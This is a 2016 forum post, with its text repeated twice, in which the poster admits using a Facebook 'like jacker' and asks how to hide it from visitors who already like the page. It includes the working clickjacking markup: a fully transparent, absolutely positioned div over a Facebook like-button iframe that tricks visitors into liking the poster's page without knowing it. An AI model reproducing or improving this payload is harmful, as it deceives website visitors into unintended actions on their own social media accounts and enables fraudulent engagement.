11-14-2016, 01:30 PM
Hi everyone,
i found this like jacker i have been using but when someone already likes the page it still shows the like or unlike buttons and does not dissappear
i have tried messing with the code so it doesnt show if they already like but im not sure how to do it and i dont know much about coding...
can anyone tell me how to hide it for people that already like please? thanks
here is the div part
i found this like jacker i have been using but when someone already likes the page it still shows the like or unlike buttons and does not dissappear
i have tried messing with the code so it doesnt show if they already like but im not sure how to do it and i dont know much about coding...
can anyone tell me how to hide it for people that already like please? thanks
here is the div part
Code:
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/{mypagewashere}&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
<!--end facebook like frame code-->
</div>